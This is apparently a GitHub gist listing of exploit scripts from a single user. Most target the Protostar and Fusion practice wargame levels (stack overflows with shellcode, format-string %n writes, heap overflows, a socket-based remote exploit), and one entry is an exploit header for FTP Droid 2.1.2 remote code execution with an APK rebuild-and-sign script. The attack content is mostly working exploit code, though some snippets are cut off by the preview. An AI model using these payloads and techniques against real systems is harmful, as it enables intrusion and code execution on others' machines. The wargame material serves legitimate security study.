TheRealJunior
/ stack5.py
Created
June 3, 2018 18:38
protostar stack5 python script for payload input
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| shellcode = "\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xffHello wolrd!\r\n" | |
| with open('/tmp/stack5', 'w') as f: | |
| times = 76 - sys.getsizeof(shellcode) # to fil the rest of the space | |
| f.write(shellcode); | |
| f.write('a' * times) | |
| f.write('\xe0\xfc\xff\xbf') # write the pointer to the start of the address as EIP |
TheRealJunior
/ protostar_format2.py
Created
September 9, 2018 15:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| write_formt_exploit = '%20x%20x%20x%n' | |
| write_ptr = '\xe4\x96\x04\x08' | |
| input = write_ptr + write_formt_exploit + '\n' | |
| proc = subprocess.Popen(['/opt/protostar/bin/format2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
| stdout,stderr = proc.communicate(input=input) | |
| print stdout |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| #we need to write 16930116 more chars | |
| target_address = '\xf4\x96\x04\x08' | |
| value_to_write = '\xF7\x54\x02\x01' | |
| padding = '\x41' | |
| leak_ptr = '%x ' * 12 | |
| write_to_ptr_format = '%x%x%x%x%x%x%x%x%x%x%x %0*c' + '%n' |
TheRealJunior
/ protostar_format4_file_input.py
Created
September 9, 2018 15:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| # hello function 080484b4 | |
| # vuln function 080484d2 | |
| # printf address 0804971c | |
| # exit address 08049724 | |
| orig_leak_ptr = '%x %x %x %x %x %x' | |
| leak_ptr = '%x %x %x %0*x %n' | |
| write_to_address = '\x24\x97\x04\x08' # where should we write |
TheRealJunior
/ protostar_heap0.py
Created
September 9, 2018 16:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| input = 'a' * 64 + 'b' * 8 + '\x64\x84\x04\x08' | |
| proc = subprocess.Popen(['/opt/protostar/bin/heap0',input], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
| stdout,stderr = proc.communicate() | |
| print stdout |
TheRealJunior
/ protostar_heap2.py
Last active
September 28, 2018 12:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| input = 'auth 1111111111111111111111111111111111111111\nreset\nservice 111111111111111111111111111111111111111111111\nlogin\n' | |
| proc = subprocess.Popen(['/opt/protostar/bin/heap2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
| stdout,stderr = proc.communicate(input=input) | |
| print(stdout) | |
| # 08048494 g F .text 00000025 winner |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| # shellcode thanks to https://blackndoor.fr/protostar-final0/, https://www.exploit-db.com/exploits/13427/ | |
| shellcode = '\x90' * 150 + b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5f\x81\xef\xdf\xff\xff\xff\x57\x5e\x29\xc9\x80\xc1\xb8\x8a\x07\x2c\x41\xc0\xe0\x04\x47\x02\x07\x2c\x41\x88\x06\x46\x47\x49\xe2\xedDBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKBAFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIAJDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJOBLAALMNIA" | |
| csocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| csocket.connect(('127.0.0.1', 2995)) | |
| # ret addr thanks to https://blackndoor.fr/protostar-final0/ | |
| ret_addr = b'\x60\xfa\xff\xbf' |
TheRealJunior
/ fusion_level01.py
Created
September 28, 2018 12:00
fusion level00 and probably level01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import struct | |
| def exploit(): | |
| # sent_payload 'GET ' | |
| padding = b'a' * 139 | |
| payload = padding + struct.pack('I', 0xdeadbeef) | |
| # connecting | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: FTP Droid 2.1.2 Remote Code Execution (1-click) | |
| # Google Dork: [if applicable] | |
| # Date: 30.12.2018 | |
| # Exploit Author: Guy Ishay | |
| # Vendor Homepage: https://forum.xda-developers.com/showthread.php?t=1175825 | |
| # Software Link: https://play.google.com/store/apps/details?id=berserker.android.apps.ftpdroid | |
| # Version: 2.1.2 | |
| # Tested on: Android 4.4 | |
| # CVE : None | |
| # ==================== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # pretty basic shit | |
| rm stage1-unsigned.apk res.apk | |
| apktool b base -o stage1-unsigned.apk | |
| jarsigner -keystore my-release-key.keystore -storepass 1234567890 stage1-unsigned.apk my-key-alias | |
| mv stage1-unsigned.apk res.apk |
OlderNewer